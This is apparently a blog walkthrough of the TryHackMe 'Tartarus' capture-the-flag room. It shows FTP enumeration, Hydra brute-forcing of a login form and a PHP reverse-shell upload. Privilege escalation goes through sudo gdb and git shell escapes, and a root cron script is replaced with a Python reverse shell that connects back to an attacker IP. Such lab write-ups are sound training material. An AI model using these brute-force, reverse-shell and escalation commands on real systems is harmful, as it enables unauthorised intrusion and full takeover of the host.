[TryHackMe] Tartarus
A walkthrough for the Tartarus room, available on the TryHackMe platform.
![[TryHackMe] Tartarus](/content/images/size/w2000/2020/08/background.jpeg)
Difficulty level: Easy
Aim: Hack this machine and obtain the user and root flags.
Link: https://www.tryhackme.com/room/tartaraus
This box is based on simple enumeration of services and multiple basic privilege escalation techniques.
Information Gathering
The target IP address is provided when the machine is deployed.
Target: 10.10.237.37
Scanning
A quick scan of open ports and services using nmap to start:
nmap -sC -sV -vvv 10.10.140.123
data:image/s3,"s3://crabby-images/7585c/7585c245135f576112b8e5f0271a779402f45f85" alt=""
From this we can see the following ports and services:
- port 21/tcp - FTP - (vsftpd 3.0.3 - anonymous login allowed)
- port 22/tcp - SSH - (OpenSSH 7.2p2)
- port 80/tcp - HTTP - (Apache httpd 2.4.18)
Enumeration
The anonymous FTP login seems interesting, let's check it out:
ftp 10.10.140.123
anonymous
<blank-pass>
data:image/s3,"s3://crabby-images/127cb/127cb312b858f8810f193ff09c3511c2bc1e59ec" alt=""
ls -la
get test.txt
So, we found a file named test.txt, and looking closely at the directory listing there is another directory we can look in. Did you spot it?
data:image/s3,"s3://crabby-images/a6bd5/a6bd5bbf0256341b452807701786d4ca41f1326c" alt=""
Changing into this directory and looking deeper we find a file named yougotgoodeyes.txt, which we can download locally.
The test.txt file is exactly that, but yougotgoodeyes.txt contains something that will be useful as we explore the HTTP service:
data:image/s3,"s3://crabby-images/336cf/336cf809341d64aeaaf86b6fe130f5fe716e8e2b" alt=""
Taking a look at http://10.10.140.123 shows the default Apache2 page:
data:image/s3,"s3://crabby-images/936c9/936c93c73f11138ff3358535f4b22d1a9bbeeb4d" alt=""
A quick scan using nikto shows there is a robots.txt file available:
nikto -host http://10.10.140.123
data:image/s3,"s3://crabby-images/5257c/5257ccd1eb2e71433f64f2895d729c89fb078e00" alt=""
Inspecting the robots.txt file returns an open directory to be explored further:
data:image/s3,"s3://crabby-images/d6389/d63899cf70275c39836edb0c2781be4adc728a6f" alt=""
data:image/s3,"s3://crabby-images/b78ca/b78ca2f8fab32f59a4b562203671ede7c3f20eef" alt=""
We'll download these to our local machine for later use:
wget http://10.10.140.123/admin-dir/credentials.txt
wget http://10.10.140.123/admin-dir/userid
What about that directory we found from the FTP enumeration? Let's have a look:
data:image/s3,"s3://crabby-images/4d636/4d63656f3980cb39bf420b974706c6d7e2a71bda" alt=""
Gaining Access
Now that we have a login page and some credentials we can try brute-forcing this with Hydra:
hydra -L userid -P credentials.txt 10.10.140.123 http-post-form "/<directory-removed>/authenticate.php:username=^USER^&password=^PASS^:Incorrect username!"
data:image/s3,"s3://crabby-images/55253/552539f9ed5b050ce248a08420fedf05cf609b63" alt=""
From this we can see the username is enox and a list of 15 possible passwords.
We can re-run Hydra with the username as enox and "Incorrect password!" as the error message to determine the correct password:
hydra -L enox -P credentials.txt 10.10.140.123 http-post-form "/<directory-removed>/authenticate.php:username=^USER^&password=^PASS^:Incorrect password!"
data:image/s3,"s3://crabby-images/6a0dc/6a0dc5ff18752645046214fcf4c9d7a75ab2d7c1" alt=""
Once logged in we see the following page:
data:image/s3,"s3://crabby-images/6caf9/6caf9ee3bb5d849be2fe1430ba9085f3247d1e5d" alt=""
Seems we are able to upload files, let's try uploading a reverse shell:
cp /usr/share/webshells/php/php-reverse-shell.php revshell.php
(Don't forget to edit the reverse shell to include the IP and port of your machine before uploading it!)
data:image/s3,"s3://crabby-images/995d9/995d911d8679b36412c3954016d13e3995847414" alt=""
data:image/s3,"s3://crabby-images/99ae1/99ae1b654d40b5dd02447a067a26d0fa7a424373" alt=""
Now that the shell is uploaded we need to know which directory this was saved to!
A quick scan using dirb will reveal this to be: /images/uploads
data:image/s3,"s3://crabby-images/25871/25871310c30b3b2b02db0bcf96c0a0c55a56f5dc" alt=""
Before accessing the shell, we need to setup a listener on our local machine:
nc -nlvp 1337
Once the listener is active, selecting the uploaded file will give us our reverse shell:
data:image/s3,"s3://crabby-images/436f8/436f81a95d4a8b6788c90333f6d43dc389038bc0" alt=""
From here we can change to the /home/d4rckh directory to obtain the user flag:
cd /home
ls -la
cd d4rckh
ls -la
cat user.txt
data:image/s3,"s3://crabby-images/3a5e8/3a5e81d8191277da09ae6196f37419b2191179ad" alt=""
Privilege Escalation
We have an initial foothold on the target, so let's see if we have any sudo privileges:
sudo -l -l
data:image/s3,"s3://crabby-images/d4fd9/d4fd9bebbb5ad08aa33f94e7c8eff904a2e08e05" alt=""
Our current user (www-data) has access to run /var/www/gdb as the user thirtytwo. We can take advantage of this to become user thirtytwo by running the following:
sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit
data:image/s3,"s3://crabby-images/a7d69/a7d69af91ce1b4e5b4b267384bbd9045ac0e7aa4" alt=""
Now that we are the user thirtytwo let's check those sudo privileges again:
sudo -l
data:image/s3,"s3://crabby-images/5472e/5472e34c025c5c54cef5296f6a05d75bc8f1efe4" alt=""
Great, we have access to run /usr/bin/git as the user d4rckh.
Let's take this opportunity to upgrade our basic shell to a fully-interactive TTY shell (something we could have done earlier!):
python -c 'import pty;pty.spawn("bin/bash")'
Using the following commands to run /usr/bin/git with sudo will allow us to escalate once again and become the user d4rckh:
sudo -u d4rckh /usr/bin/git -p help config
!/bin/sh
data:image/s3,"s3://crabby-images/847db/847db518bbfd2f87ea9cde4d63081e7f5779c550" alt=""
Switching to the /home/d4rckh directory shows a python script named cleanup.py
data:image/s3,"s3://crabby-images/c4b82/c4b8259cbd01c629f7d9a49a4c5b4df4b02e551d" alt=""
This looks like a simple maintenance script to delete the contents of the /home/cleanup/ directory and any subfolders.
Checking the crontab shows that this script is scheduled to run every two minutes as the root user:
data:image/s3,"s3://crabby-images/6756c/6756c5e61702674b38f5a6a82cde2b8741b70b5f" alt=""
As we have full control (read/write/execute) of the cleanup.py script we can edit this to spawn a reverse shell when it runs as root.
Before we do that we will upgrade to another fully-interactive TTY shell and backup the existing script:
python -c 'import pty; pty.spawn("/bin/bash")'
data:image/s3,"s3://crabby-images/59d24/59d24759e9cd14fd621c2cd2e139c6bf6dfc6cf5" alt=""
mv cleanup.py cleanup.py.bak
data:image/s3,"s3://crabby-images/e0ad9/e0ad99e65b98d6fee6c13191037de8d979db424a" alt=""
We can now create a new cleanup.py script containing the reverse shell (add your own IP address and port):
# =*- coding: utf-8 -*-
#!/usr/bin/env python
import socket, os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.63.207",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.system("/bin/sh -i")
data:image/s3,"s3://crabby-images/e226b/e226b2c05af1537189e586a9d92caa1a74ad3ebe" alt=""
From a separate local Kali terminal we can then run the listener and wait patiently for the cronjob to run and spawn the reverse shell:
nc -nlvp 4444
Lastly, we can read the contents of the root.txt file to complete this room:
data:image/s3,"s3://crabby-images/38f55/38f553082f509724c66997fa15c53336664c3082" alt=""
Please feel free to contact me via Twitter and thanks for reading.